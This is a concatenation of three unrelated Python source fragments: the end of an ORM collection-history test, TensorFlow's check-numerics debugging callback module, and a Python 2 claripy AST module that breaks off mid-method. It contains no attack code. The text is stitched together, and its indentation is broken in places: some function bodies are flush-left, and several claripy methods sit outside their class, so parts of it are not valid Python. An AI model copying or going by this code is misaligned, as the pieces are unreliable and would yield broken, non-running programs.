            Address(email_address='a3'), Address(email_address='a4'), \
            Address(email_address='a5')
        u1.addresses = [a1, a2]
        u1.addresses = [a2, a3, a4, a5]
        self._assert_history(u1,
                             ([a2, a3, a4, a5], [], [])
                             )

    def test_replace_persistent_autoflush(self):
        Address = self.classes.Address
        u1, a1, s = self._persistent_fixture(autoflush=True)
        a2, a3, a4, a5 = Address(email_address='a2'), \
            Address(email_address='a3'), Address(email_address='a4'), \
            Address(email_address='a5')
        # With autoflush, the first assignment is flushed before the
        # second, so a2 becomes "unchanged" and a1 "deleted".
        u1.addresses = [a1, a2]
        u1.addresses = [a2, a3, a4, a5]
        self._assert_history(u1,
                             ([a3, a4, a5], [a2], [a1]),
                             compare_passive=([a3, a4, a5], [], [a1])
                             )

    def test_persistent_but_readded_noflush(self):
        u1, a1, s = self._persistent_fixture(autoflush=False)
        u1.addresses.append(a1)
        s.flush()
        # Re-appending an already-committed member: unchanged in the
        # default view, "added" in the passive view.
        u1.addresses.append(a1)
        self._assert_history(u1,
                             ([], [a1], []),
                             compare_passive=([a1], [], [])
                             )

    def test_persistent_but_readded_autoflush(self):
        u1, a1, s = self._persistent_fixture(autoflush=True)
        u1.addresses.append(a1)
        s.flush()
        u1.addresses.append(a1)
        self._assert_history(u1,
                             ([], [a1], []),
                             compare_passive=([a1], [], [])
                             )

    def test_missing_but_removed_noflush(self):
        u1, a1, s = self._persistent_fixture(autoflush=False)
        # Removing a member that was never present: empty history in the
        # default view, "deleted" in the passive view.
        u1.addresses.remove(a1)
        self._assert_history(u1, ([], [], []), compare_passive=([], [], [a1]))
| |
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Eager-graph unified check numerics callback."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import threading
import numpy as np
from tensorflow.core.protobuf import debug_event_pb2
from tensorflow.python.debug.lib import op_callbacks_common
from tensorflow.python.debug.lib import source_utils
from tensorflow.python.framework import op_callbacks
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_debug_ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import compat
from tensorflow.python.util.tf_export import tf_export
# Many ops have benign NaN outputs, and running them with check_numerics
# on will create unwanted errors
# TODO(b/142497024): Replace this whitelist with function decorators in the ops
# (op_type, output_slot) pairs whose outputs may legitimately be NaN and
# must therefore never be instrumented with check_numerics.
IGNORE_OP_OUTPUTS = (
    # For FusedBatchNorm, if the input tensor is empty then batch_mean and
    # batch_variance will be NaN. reserve_space holds intermediate values
    # derived from batch_mean and batch_variance used for gradient calculation
    (b"FusedBatchNorm", 1),  # batch_mean
    (b"FusedBatchNorm", 2),  # batch_variance
    (b"FusedBatchNorm", 3),  # reserve_space_1
    (b"FusedBatchNorm", 4),  # reserve_space_2
    # Same as above
    (b"FusedBatchNormV2", 1),  # batch_mean
    (b"FusedBatchNormV2", 2),  # batch_variance
    (b"FusedBatchNormV2", 3),  # reserve_space_1
    (b"FusedBatchNormV2", 4),  # reserve_space_2
    # Same as above, but reserve_space_3 holds additional intermediate values
    (b"FusedBatchNormV3", 1),  # batch_mean
    (b"FusedBatchNormV3", 2),  # batch_variance
    (b"FusedBatchNormV3", 3),  # reserve_space_1
    (b"FusedBatchNormV3", 4),  # reserve_space_2
    (b"FusedBatchNormV3", 5),  # reserve_space_3
)

# Some frequently used ops are generally safe and we can skip them to reduce
# overhead. NOTE: This list is compiled by observing operations called by
# models in practice and is not a comprehensive list of safe operations.
SAFE_OPS = (
    b"Concat",
    b"ConcatV2",
    b"ExpandDims",
    b"Fill",
    b"Gather",
    b"Maximum",
    b"Minimum",
    b"Reshape",
    b"Slice",
    b"Squeeze",
    b"Stack",
    b"StridedSlice",
    b"StridedSliceGrad",
    b"TensorListConcatV2",
    b"TensorListGather",
    b"TensorListGetItem",
    b"TensorListPopBack",
    b"TensorListStack",
    b"Transpose",
    b"Unpack",
)

# Per-thread state holding the active CheckNumericsCallback (if any);
# enable/disable below operate on the calling thread only.
_state = threading.local()
def limit_string_length(string, max_len=50):
  """Limit the length of input string.

  Truncated values keep their trailing ``max_len`` characters, prefixed
  with a "..." marker.

  Args:
    string: Input string.
    max_len: (int or None) If int, the length limit. If None, no limit.

  Returns:
    Possibly length-limited string.
  """
  needs_truncation = max_len is not None and len(string) > max_len
  if not needs_truncation:
    return string
  # Keep the tail of the string; len(string) - max_len is always >= 1 here.
  return "..." + string[len(string) - max_len:]
# A dictionary that supports looking up the original input tensor names.
_CHECK_NUMERICS_INPUT_LOOKUP = collections.defaultdict(dict)
def _maybe_lookup_original_input_tensor(graph, tensor):
if (graph and
graph in _CHECK_NUMERICS_INPUT_LOOKUP and
tensor.name in _CHECK_NUMERICS_INPUT_LOOKUP[graph]):
return _CHECK_NUMERICS_INPUT_LOOKUP[graph][tensor.name]
else:
return tensor
def get_check_numerics_error_message(slot,
                                     num_outputs,
                                     op_type,
                                     tensor,
                                     inputs,
                                     graph=None,
                                     traceback=None,
                                     stack_height_limit=30,
                                     path_length_limit=50):
  """Create a meaningful and user-friendly error message about offending tensor.

  The error message reveals the following info about the op that outputs
  NaN/Infinity: dtype, shape (to the extent known at graph-construction time),
  input tensors, stack trace for op creation (if is graph mode).

  Args:
    slot: (int) slot index of the tensor output.
    num_outputs: (int) total number of outputs of the op.
    op_type: (str) Type of the op that generates `tensor`.
    tensor: (Tensor) the offending tensor, i.e., the tensor that contains
      Infinities or NaNs.
    inputs: (array of Tensor) inputs to the op that generates `tensor`.
    graph: (tf.Graph) the graph object that `tensor` belongs to. Available only
      under graph mode.
    traceback: (list of trace frames) the stack trace of the op's creation.
      Available only under graph mode.
    stack_height_limit: (int or None) If int, limit to the height of the stack
      trace printed in the error message. If None, no limit to the height.
    path_length_limit: (int or None) Length limit for file paths included in the
      formatted stack trace.

  Returns:
    (str) A formatted error message.
  """
  eager_vs_graph_qualifier = "graph" if graph else "eagerly-executing"
  message = "\n"
  message += (
      "\n!!! Detected Infinity or NaN in output %d of "
      "%s op \"%s\" (# of outputs: %d) !!!\n" %
      (slot, eager_vs_graph_qualifier, op_type, num_outputs))
  message += " dtype: %s\n" % tensor.dtype
  message += " shape: %s\n" % (tensor.shape,)
  if not graph:
    # This is an eager tensor. We can get its numpy value and count
    # NaNs and Infs.
    is_inf = np.isinf(tensor)
    num_neg_inf = np.sum(np.logical_and(np.less(tensor, 0.), is_inf))
    num_pos_inf = np.sum(np.logical_and(np.greater(tensor, 0.), is_inf))
    num_nan = np.sum(np.isnan(tensor))
    if num_neg_inf > 0:
      message += " # of -Inf elements: %s\n" % num_neg_inf
    if num_pos_inf > 0:
      message += " # of +Inf elements: %s\n" % num_pos_inf
    if num_nan:
      message += " # of +NaN elements: %s\n" % num_nan
  if len(inputs) > 1:
    message += "\n Input tensors (%d):\n" % len(inputs)
    # Use a distinct loop variable here: the original code rebound the
    # `slot` parameter, shadowing the output-slot argument.
    for input_slot, input_tensor in enumerate(inputs):
      message += " %d: %s\n" % (
          input_slot, _maybe_lookup_original_input_tensor(graph, input_tensor))
  elif len(inputs) == 1:
    message += "\n Input tensor: %s\n" % (
        _maybe_lookup_original_input_tensor(graph, inputs[0]))
  if graph and hasattr(graph, "name") and graph.name:
    message += " Graph name: \"%s\"\n" % graph.name
  # Format the stack trace for the op's creation. We omit files that
  # belong to tensorflow itself.
  if graph and traceback:
    message += (
        "\n Stack trace of op's creation (\"->\": inferred user code):\n")
    if stack_height_limit is not None and len(traceback) > stack_height_limit:
      num_omitted_frames = len(traceback) - stack_height_limit
      message += " + ... (Omitted %d frames)\n" % num_omitted_frames
    # Bug fix: slicing with `traceback[-stack_height_limit:]` raised
    # TypeError when stack_height_limit was None, even though None is
    # documented as "no limit". Use the full traceback in that case.
    if stack_height_limit is None:
      frames = traceback
    else:
      frames = traceback[-stack_height_limit:]
    for filepath, lineno, function_name, source_line in frames:
      user_code_indicator = " "
      if not source_utils.guess_is_tensorflow_py_library(filepath):
        user_code_indicator = " -> "
      message += " + %s (L%d) %s\n" % (
          limit_string_length(filepath, path_length_limit), lineno,
          function_name)
      if source_line is not None:
        message += "%s| %s\n" % (user_code_indicator, source_line)
  message += "\n"
  return message
def _debug_summary(x):
  # Reduce tensor x via DebugNumericSummaryV2 in REDUCE_INF_NAN_THREE_SLOTS
  # mode so check_numerics can inspect a small reduced tensor instead of
  # the full output (used on the async path in CheckNumericsCallback).
  # NOTE(review): exact slot semantics are defined by the
  # DebugNumericSummaryV2 op -- see its op documentation.
  return gen_debug_ops.debug_numeric_summary_v2(
      x,
      tensor_debug_mode=(
          debug_event_pb2.TensorDebugMode.REDUCE_INF_NAN_THREE_SLOTS))
class CheckNumericsCallback(object):
  """Wrapper for the numerics-checking callback for thread locality."""

  def __init__(self, stack_height_limit, path_length_limit):
    # Limits applied when formatting the op-creation stack trace in
    # eager-mode error messages.
    self._stack_height_limit = stack_height_limit
    self._path_length_limit = path_length_limit

  def callback(self,
               op_type,
               inputs,
               attrs,
               outputs,
               op_name=None,
               graph=None):
    """Eager-function unified callback for checking numerics.

    In graph mode, returns outputs with float tensors wrapped in
    CheckNumericsV2 ops; in eager mode, runs check_numerics immediately
    and returns None (outputs pass through unchanged).
    """
    del attrs, op_name  # Unused
    op_type_bytes = compat.as_bytes(op_type)
    is_v1_graph_mode = not ops.executing_eagerly_outside_functions()
    # Skip ops the callback machinery must ignore and known-safe ops.
    if (op_type_bytes in op_callbacks_common.OP_CALLBACK_SKIP_OPS or
        op_type_bytes in SAFE_OPS):
      return None
    if graph:
      # Under graph mode. Insert check_numerics op.
      instrumented_outputs = []
      for slot, output in enumerate(outputs):
        if (output.dtype.is_floating and
            (op_type_bytes, slot) not in IGNORE_OP_OUTPUTS):
          checked_output = array_ops.check_numerics_v2(
              # TF v2 has automatic control dependencies added to stateful async
              # ops, which allows us to run check_numerics asynchronously.
              # In the above case we use debug_summary to reduce all output
              # tensors asynchronously from the op being checked and then
              # process the tensor summary with check_numerics.
              output if is_v1_graph_mode else _debug_summary(output),
              get_check_numerics_error_message(
                  slot,
                  len(outputs),
                  op_type,
                  output,
                  inputs,
                  graph=graph,
                  traceback=output.op.traceback))
          # Remember the original tensor so later error messages can name it.
          _CHECK_NUMERICS_INPUT_LOOKUP[graph][checked_output.name] = output
          instrumented_outputs.append(
              checked_output if is_v1_graph_mode else output)
        else:
          instrumented_outputs.append(output)
      return instrumented_outputs
    else:
      if op_type_bytes == b"CheckNumericsV2":
        # TODO(b/140334369): Remove this special casing logic once op_callback.
        # automatically prevents infinite recursion in eager mode.
        return None
      # Under eager mode. Eagerly execute check_numerics op.
      for slot, output in enumerate(outputs):
        if (output.dtype.is_floating and
            (op_type_bytes, slot) not in IGNORE_OP_OUTPUTS):
          array_ops.check_numerics_v2(
              output,
              get_check_numerics_error_message(
                  slot, len(outputs), op_type, output, inputs,
                  stack_height_limit=self._stack_height_limit,
                  path_length_limit=self._path_length_limit))
@tf_export("debugging.enable_check_numerics")
def enable_check_numerics(stack_height_limit=30,
                          path_length_limit=50):
  r"""Enable tensor numerics checking in an eager/graph unified fashion.

  The numerics checking mechanism will cause any TensorFlow eager execution or
  graph execution to error out as soon as an op's output tensor contains
  infinity or NaN.

  This method is idempotent. Calling it multiple times has the same effect
  as calling it once.

  This method takes effect only on the thread in which it is called.

  When a op's float-type output tensor contains any Infinity or NaN, an
  `tf.errors.InvalidArgumentError` will be thrown, with an error message that
  reveals the following information:
    - The type of the op that generated the tensor with bad numerics.
    - Data type (dtype) of the tensor.
    - Shape of the tensor (to the extent known at the time of eager execution
      or graph construction).
    - Name of the containing graph (if available).
    - (Graph mode only): The stack trace of the intra-graph op's creation,
      with a stack-height limit and a path-length limit for visual clarity.
      The stack frames that belong to the user's code (as opposed to
      tensorflow's internal code) are highlighted with a text arrow ("->").
    - (Eager mode only): How many of the offending tensor's elements are
      `Infinity` and `NaN`, respectively.

  Once enabled, the check-numerics mechanism can be disabled by using
  `tf.debugging.disable_check_numerics()`.

  Example usage:

  1. Catching infinity during the execution of a `tf.function` graph:

     ```py
     import tensorflow as tf

     tf.debugging.enable_check_numerics()

     @tf.function
     def square_log_x_plus_1(x):
       v = tf.math.log(x + 1)
       return tf.math.square(v)

     x = -1.0

     # When the following line runs, a function graph will be compiled
     # from the Python function `square_log_x_plus_1()`. Due to the
     # `enable_check_numerics()` call above, the graph will contain
     # numerics checking ops that will run during the function graph's
     # execution. The function call generates an -infinity when the Log
     # (logarithm) op operates on the output tensor of the Add op.
     # The program errors out at this line, printing an error message.
     y = square_log_x_plus_1(x)
     z = -y
     ```

  2. Catching NaN during eager execution:

     ```py
     import numpy as np
     import tensorflow as tf

     tf.debugging.enable_check_numerics()

     x = np.array([[0.0, -1.0], [4.0, 3.0]])

     # The following line executes the Sqrt op eagerly. Due to the negative
     # element in the input array, a NaN is generated. Due to the
     # `enable_check_numerics()` call above, the program errors immediately
     # at this line, printing an error message.
     y = tf.math.sqrt(x)
     z = tf.matmul(y, y)
     ```

  Args:
    stack_height_limit: Limit to the height of the printed stack trace.
      Applicable only to ops in `tf.function`s (graphs).
    path_length_limit: Limit to the file path included in the printed stack
      trace. Applicable only to ops in `tf.function`s (graphs).
  """
  # Idempotence: only register a new callback if this thread has none.
  if not hasattr(_state, "check_numerics_callback"):
    _state.check_numerics_callback = CheckNumericsCallback(
        stack_height_limit, path_length_limit)
  op_callbacks.add_op_callback(_state.check_numerics_callback.callback)
  logging.info(
      "Enabled check-numerics callback in thread %s",
      threading.current_thread().name)
@tf_export("debugging.disable_check_numerics")
def disable_check_numerics():
  """Disable the eager/graph unified numerics checking mechanism.

  This method can be used after a call to `tf.debugging.enable_check_numerics()`
  to disable the numerics-checking mechanism that catches infinity and NaN
  values output by ops executed eagerly or in tf.function-compiled graphs.

  This method is idempotent. Calling it multiple times has the same effect
  as calling it once.

  This method takes effect only on the thread in which it is called.
  """
  if not hasattr(_state, "check_numerics_callback"):
    return
  try:
    op_callbacks.remove_op_callback(_state.check_numerics_callback.callback)
    delattr(_state, "check_numerics_callback")
    logging.info(
        "Disabled check-numerics callback in thread %s",
        threading.current_thread().name)
  except KeyError:
    # Tolerate disabling the check numerics callback without
    # enable_check_numerics() being called first.
    pass
| |
import os
import sys
import struct
import weakref
import hashlib
import itertools
import collections
import cPickle as pickle
import logging
# Module-level logger for this AST module.
l = logging.getLogger("claripy.ast")

import ana

# True when running as a worker process (driven by the WORKER env var).
WORKER = bool(os.environ.get('WORKER', False))

# Unpacker used to split an md5 digest (16 bytes) into two 64-bit ints.
md5_unpacker = struct.Struct('2Q')

#pylint:enable=unused-argument
#pylint:disable=unidiomatic-typecheck
def _inner_repr(a, **kwargs):
    """Return repr(a), delegating to the AST-aware repr for Base instances."""
    if not isinstance(a, Base):
        return repr(a)
    return a.__repr__(inner=True, **kwargs)
class ASTCacheKey(object):
    """Hash-identity wrapper around an AST, suitable as a cache-dict key."""

    def __init__(self, a):
        # The wrapped AST; equality and hashing both defer to its hash.
        self.ast = a

    def __hash__(self):
        return hash(self.ast)

    def __eq__(self, other):
        return hash(self.ast) == hash(other.ast)

    def __repr__(self):
        type_name = self.ast._type_name()
        inner = self.ast.__repr__(inner=True)
        return '<Key %s %s>' % (type_name, inner)
#
# AST variable naming
#
var_counter = itertools.count()
_unique_names = True
def _make_name(name, size, explicit_name=False, prefix=""):
if _unique_names and not explicit_name:
return "%s%s_%d_%d" % (prefix, name, var_counter.next(), size)
else:
return name
class Base(ana.Storable):
    """
    An AST tracks a tree of operations on arguments. It has the following methods:

        op: the operation that is being done on the arguments
        args: the arguments that are being used
        length: the length (in bits)

    AST objects have *hash identity*. This means that an AST that has the same hash as
    another AST will be the *same* object. For example, the following is true:

        a, b = two different ASTs
        c = b + a
        d = b + a
        assert c is d

    This is done to better support serialization and better manage memory.
    """
    # Slotted attributes: core fields (op/args/variables/symbolic/length),
    # cached values (_hash, _cache_key, _excavated, _burrowed), and
    # bookkeeping (_errored, _eager_backends, annotations, ...).
    __slots__ = [ 'op', 'args', 'variables', 'symbolic', '_hash', '_simplified',
                  '_cache_key', '_errored', '_eager_backends', 'length', '_excavated', '_burrowed', '_uninitialized',
                  '_uc_alloc_depth', 'annotations', 'simplifiable', '_uneliminatable_annotations', '_relocatable_annotations']
    # Weak cache enforcing hash identity: hash -> live AST instance.
    _hash_cache = weakref.WeakValueDictionary()

    # Simplification levels recorded in _simplified.
    FULL_SIMPLIFY=1
    LITE_SIMPLIFY=2
    UNSIMPLIFIED=0
    def __new__(cls, op, args, **kwargs):
        """
        This is called when you create a new Base object, whether directly or through an operation.
        It finalizes the arguments (see the _finalize function, above) and then computes
        a hash. If an AST of this hash already exists, it returns that AST. Otherwise,
        it creates, initializes, and returns the AST.

        :param op:              The AST operation ('__add__', 'Or', etc)
        :param args:            The arguments to the AST operation (i.e., the objects to add)
        :param variables:       The symbolic variables present in the AST (default: empty set)
        :param symbolic:        A flag saying whether or not the AST is symbolic (default: False)
        :param length:          An integer specifying the length of this AST (default: None)
        :param collapsible:     A flag of whether or not Claripy can feel free to collapse this AST. This is mostly used
                                to keep Claripy from collapsing Reverse operations, so that they can be undone with
                                another Reverse.
        :param simplified:      A measure of how simplified this AST is. 0 means unsimplified, 1 means fast-simplified
                                (basically, just undoing the Reverse op), and 2 means simplified through z3.
        :param errored:         A set of backends that are known to be unable to handle this AST.
        :param eager_backends:  A list of backends with which to attempt eager evaluation
        :param annotations:     A frozenset of annotations applied onto this AST.
        """
        #if any(isinstance(a, BackendObject) for a in args):
        #   raise Exception('asdf')

        # fix up args and kwargs: unwrap claripy-convertible backend objects
        a_args = tuple((a.to_claripy() if isinstance(a, BackendObject) else a) for a in args)
        # The AST is symbolic if any of its (AST) arguments is symbolic.
        if 'symbolic' not in kwargs:
            kwargs['symbolic'] = any(a.symbolic for a in a_args if isinstance(a, Base))
        # The variable set is the union of the argument ASTs' variable sets.
        if 'variables' not in kwargs:
            kwargs['variables'] = frozenset.union(
                frozenset(), *(a.variables for a in a_args if isinstance(a, Base))
            )
        elif type(kwargs['variables']) is not frozenset: #pylint:disable=unidiomatic-typecheck
            kwargs['variables'] = frozenset(kwargs['variables'])
        if 'errored' not in kwargs:
            kwargs['errored'] = set.union(set(), *(a._errored for a in a_args if isinstance(a, Base)))
        if 'add_variables' in kwargs:
            kwargs['variables'] = kwargs['variables'] | kwargs['add_variables']

        # Attempt eager (concrete) evaluation for non-symbolic, non-leaf ops;
        # the first backend that produces a result short-circuits AST creation.
        eager_backends = list(backends._eager_backends) if 'eager_backends' not in kwargs else kwargs['eager_backends']
        if not kwargs['symbolic'] and eager_backends is not None and op not in operations.leaf_operations:
            for eb in eager_backends:
                try:
                    r = operations._handle_annotations(eb._abstract(eb.call(op, args)), args)
                    if r is not None:
                        return r
                    else:
                        # NOTE(review): this mutates the list being iterated;
                        # presumably tolerated since failing backends are
                        # dropped for good -- confirm skipping is intended.
                        eager_backends.remove(eb)
                except BackendError:
                    eager_backends.remove(eb)

        # if we can't be eager anymore, null out the eagerness
        kwargs['eager_backends'] = None

        # whether this guy is initialized or not
        if 'uninitialized' not in kwargs:
            kwargs['uninitialized'] = None
        if 'uc_alloc_depth' not in kwargs:
            kwargs['uc_alloc_depth'] = None
        if 'annotations' not in kwargs:
            kwargs['annotations'] = ()

        # Hash-consing: reuse the live cached AST for this hash if present.
        h = Base._calc_hash(op, a_args, kwargs)
        self = cls._hash_cache.get(h, None)
        if self is None:
            self = super(Base, cls).__new__(cls, op, a_args, **kwargs)
            self.__a_init__(op, a_args, **kwargs)
            self._hash = h
            cls._hash_cache[h] = self
        # else:
        #    if self.args != f_args or self.op != f_op or self.variables != f_kwargs['variables']:
        #        raise Exception("CRAP -- hash collision")

        return self
    def __init__(self, *args, **kwargs):
        # Intentionally a no-op: real initialization happens in __a_init__,
        # which __new__ invokes only on a hash-cache miss.
        pass
    @staticmethod
    def _calc_hash(op, args, k):
        """
        Calculates the hash of an AST, given the operation, args, and kwargs.

        :param op:      The operation.
        :param args:    The arguments to the operation.
        :param k:       A dict including the 'symbolic', 'variables', and 'length' items.
        :returns:       a hash.
        """
        # Normalize args to hashable primitives. (Python 2: plain ints are
        # widened to long so equal values hash identically regardless of width.)
        args_tup = tuple(long(a) if type(a) is int else (a if type(a) in (long, float) else hash(a)) for a in args)
        to_hash = (op, args_tup, k['symbolic'], hash(k['variables']), str(k.get('length', None)), hash(k.get('annotations', None)))

        # Why do we use md5 when it's broken? Because speed is more important
        # than cryptographic integrity here. Then again, look at all those
        # allocations we're doing here... fast python is painful.
        hd = hashlib.md5(pickle.dumps(to_hash, -1)).digest()
        return md5_unpacker.unpack(hd)[0] # 64 bits
    def _get_hashables(self):
        # Hashable summary of the identity-relevant fields of this AST
        # (numeric args are stringified; everything else is hashed).
        return self.op, tuple(str(a) if type(a) in (int, long, float) else hash(a) for a in self.args), self.symbolic, hash(self.variables), str(self.length)
    #pylint:disable=attribute-defined-outside-init
    def __a_init__(self, op, args, variables=None, symbolic=None, length=None, collapsible=None, simplified=0, errored=None, eager_backends=None, add_variables=None, uninitialized=None, uc_alloc_depth=None, annotations=None): #pylint:disable=unused-argument
        """
        Initializes an AST. Takes the same arguments as Base.__new__()

        Called from __new__ only when the hash-cache lookup misses.
        """
        self.op = op
        self.args = args
        self.length = length
        self.variables = frozenset(variables)
        self.symbolic = symbolic
        self._eager_backends = eager_backends
        self._errored = errored if errored is not None else set()
        self._simplified = simplified
        self._cache_key = ASTCacheKey(self)
        self._excavated = None
        self._burrowed = None
        self._uninitialized = uninitialized
        self._uc_alloc_depth = uc_alloc_depth
        self.annotations = annotations

        ast_args = tuple(a for a in self.args if isinstance(a, Base))
        # Annotations that must never be stripped: our own non-eliminatable,
        # non-relocatable annotations plus those inherited from child ASTs.
        self._uneliminatable_annotations = frozenset(itertools.chain(
            itertools.chain.from_iterable(a._uneliminatable_annotations for a in ast_args),
            tuple(a for a in self.annotations if not a.eliminatable and not a.relocatable)
        ))

        # Relocatable annotations, deduplicated while preserving insertion
        # order (the OrderedDict's keys act as an ordered set).
        self._relocatable_annotations = collections.OrderedDict((e, True) for e in tuple(itertools.chain(
            itertools.chain.from_iterable(a._relocatable_annotations for a in ast_args),
            tuple(a for a in self.annotations if not a.eliminatable and a.relocatable)
        ))).keys()

        if len(args) == 0:
            raise ClaripyOperationError("AST with no arguments!")

        #if self.op != 'I':
        #    for a in args:
        #        if not isinstance(a, Base) and type(a) not in (int, long, bool, str, unicode):
        #            import ipdb; ipdb.set_trace()
        #            l.warning(ClaripyOperationError("Un-wrapped native object of type %s!" % type(a)))
    #pylint:enable=attribute-defined-outside-init
    def make_uuid(self, uuid=None):
        """
        This overrides the default ANA uuid with the hash of the AST. UUID is slow, and we'll soon replace it from ANA
        itself, and this will go away.

        :returns: a string representation of the AST hash.
        """
        u = getattr(self, '_ana_uuid', None)
        if u is None:
            # Default to the (stable) AST hash as the uuid and register it
            # with ANA's uuid cache.
            u = str(self._hash) if uuid is None else uuid
            ana.get_dl().uuid_cache[u] = self
            setattr(self, '_ana_uuid', u)
        return u
    @property
    def uuid(self):
        # Delegates to ANA's uuid property (make_uuid above overrides the
        # stored value with the AST hash).
        return self.ana_uuid

    def __hash__(self):
        # The hash was precomputed by _calc_hash in __new__ and cached.
        return self._hash

    @property
    def cache_key(self):
        # Stable hash-identity key object for use in caches (see ASTCacheKey).
        return self._cache_key
#
# Serialization support
#
    def _ana_getstate(self):
        """
        Support for ANA serialization.
        """
        # Everything needed to reconstruct the AST, including the
        # precomputed hash so hash identity survives the round trip.
        return self.op, self.args, self.length, self.variables, self.symbolic, self._hash, self.annotations

    def _ana_setstate(self, state):
        """
        Support for ANA deserialization.
        """
        op, args, length, variables, symbolic, h, annotations = state
        Base.__a_init__(self, op, args, length=length, variables=variables, symbolic=symbolic, annotations=annotations)
        self._hash = h
        # Re-register the deserialized AST in the hash-identity cache.
        Base._hash_cache[h] = self
#
# Collapsing and simplification
#
#def _models_for(self, backend):
# for a in self.args:
# backend.convert_expr(a)
# else:
# yield backend.convert(a)
def make_like(self, *args, **kwargs):
all_operations = operations.leaf_operations_symbolic | {'union'}
if 'annotations' not in kwargs: kwargs['annotations'] = self.annotations
if 'variables' not in kwargs and self.op in all_operations: kwargs['variables'] = self.variables
if 'uninitialized' not in kwargs: kwargs['uninitialized'] = self._uninitialized
if 'symbolic' not in kwargs and self.op in all_operations: kwargs['symbolic'] = self.symbolic
return type(self)(*args, **kwargs)
def _rename(self, new_name):
    """
    Return a copy of this leaf AST with its name (args[0]) replaced by *new_name*.

    :param new_name: the replacement variable name.
    :raises ClaripyOperationError: if this AST is not a BVS/BoolS/FPS leaf.
    """
    if self.op not in { 'BVS', 'BoolS', 'FPS' }:
        raise ClaripyOperationError("rename is only supported on leaf nodes")
    new_args = (new_name,) + self.args[1:]
    return self.make_like(self.op, new_args, length=self.length, variables={new_name})
#
# Annotations
#
def _apply_to_annotations(self, f):
    # Rebuild this AST with its annotations tuple transformed by f (the single
    # primitive all the annotation helpers below are built on).
    return self.make_like(self.op, self.args, annotations=f(self.annotations))
def append_annotation(self, a):
    """
    Appends an annotation to this AST.

    :param a: the annotation to append
    :returns: a new AST, with the annotation added
    """
    def _appended(current):
        return current + (a,)
    return self._apply_to_annotations(_appended)
def append_annotations(self, new_tuple):
    """
    Appends several annotations to this AST.

    :param new_tuple: the tuple of annotations to append
    :returns: a new AST, with the annotations added
    """
    def _appended(current):
        return current + new_tuple
    return self._apply_to_annotations(_appended)
def annotate(self, *args):
    """
    Appends annotations to this AST.

    :param args: the annotations to append, as positional arguments
    :returns: a new AST, with the annotations added
    """
    def _appended(current):
        return current + args
    return self._apply_to_annotations(_appended)
def insert_annotation(self, a):
    """
    Inserts an annotation at the front of this AST's annotations.

    :param a: the annotation to insert
    :returns: a new AST, with the annotation added
    """
    def _prepended(current):
        return (a,) + current
    return self._apply_to_annotations(_prepended)
def insert_annotations(self, new_tuple):
    """
    Inserts several annotations at the front of this AST's annotations.

    :param new_tuple: the tuple of annotations to insert
    :returns: a new AST, with the annotations added
    """
    def _prepended(current):
        return new_tuple + current
    return self._apply_to_annotations(_prepended)
def replace_annotations(self, new_tuple):
    """
    Replaces all annotations on this AST.

    :param new_tuple: the tuple of annotations to replace the old annotations with
    :returns: a new AST, carrying only the new annotations
    """
    def _replaced(_current):
        return new_tuple
    return self._apply_to_annotations(_replaced)
def remove_annotation(self, a):
    """
    Removes an annotation from this AST (all occurrences comparing equal to it).

    :param a: the annotation to remove
    :returns: a new AST, with the annotation removed
    """
    def _without(current):
        return tuple(item for item in current if item != a)
    return self._apply_to_annotations(_without)
def remove_annotations(self, remove_sequence):
    """
    Removes several annotations from this AST.

    :param remove_sequence: a sequence/set of the annotations to remove
    :returns: a new AST, with the annotations removed
    """
    def _without(current):
        return tuple(item for item in current if item not in remove_sequence)
    return self._apply_to_annotations(_without)
#
# Viewing and debugging
#
def dbg_repr(self, prefix=None):
    """
    Return a verbose debug representation of this AST.

    :param prefix: indentation prefix for nested levels; if None, a compact
                   single-line form is produced instead.
    """
    try:
        if prefix is not None:
            new_prefix = prefix + " "
            s = prefix + "<%s %s (\n" % (type(self).__name__, self.op)
            for a in self.args:
                # Recurse into child ASTs; plain values are repr()'d inline.
                s += "%s,\n" % (a.dbg_repr(prefix=new_prefix) if hasattr(a, 'dbg_repr') else (new_prefix + repr(a)))
            # Drop the trailing ",\n" left by the loop.
            s = s[:-2] + '\n'
            s += prefix + ")>"
            return s
        else:
            return "<%s %s (%s)>" % (type(self).__name__, self.op, ', '.join(a.dbg_repr() if hasattr(a, 'dbg_repr') else repr(a) for a in self.args))
    except RuntimeError:
        # Very deep ASTs can blow the recursion limit; re-raise with the
        # original traceback (Python 2 three-argument raise syntax).
        e_type, value, traceback = sys.exc_info()
        raise ClaripyRecursionError, ("Recursion limit reached during display. I sorry.", e_type, value), traceback
def _type_name(self):
    # Type tag used by __repr__ for the '<Type value>' prefix.
    return self.__class__.__name__
def shallow_repr(self, max_depth=8):
    """
    Return a repr of this AST truncated to *max_depth* levels; anything deeper
    renders as '<...>'.
    """
    return self.__repr__(max_depth=max_depth)
def __repr__(self, inner=False, max_depth=None, explicit_length=False):
    """
    Render this AST as a string.

    :param inner: True when called for a sub-expression (adds parentheses where
                  needed and drops the '<Type ...>' wrapper).
    :param max_depth: remaining depth budget; exhausted nodes render as '<...>'.
    :param explicit_length: append '#<bits>' to BVV values (used by Concat).
    """
    if max_depth is not None and max_depth <= 0:
        return '<...>'

    if max_depth is not None:
        max_depth -= 1

    # In worker processes, skip the (potentially expensive) rendering entirely.
    if WORKER:
        return '<AST something>'

    try:
        # Reversed ops (e.g. __radd__ variants) are displayed as their forward
        # form with the argument order flipped.
        if self.op in operations.reversed_ops:
            op = operations.reversed_ops[self.op]
            args = self.args[::-1]
        else:
            op = self.op
            args = self.args

        if op == 'BVS' and inner:
            value = args[0]
        elif op == 'BVS':
            value = "%s" % args[0]
            # args[1:5] carry the optional min/max/stride/uninitialized extras.
            extras = [ ]
            if args[1] is not None:
                extras.append("min=%s" % args[1])
            if args[2] is not None:
                extras.append("max=%s" % args[2])
            if args[3] is not None:
                extras.append("stride=%s" % args[3])
            if args[4] is True:
                extras.append("UNINITIALIZED")
            if len(extras) != 0:
                value += "{" + ", ".join(extras) + "}"
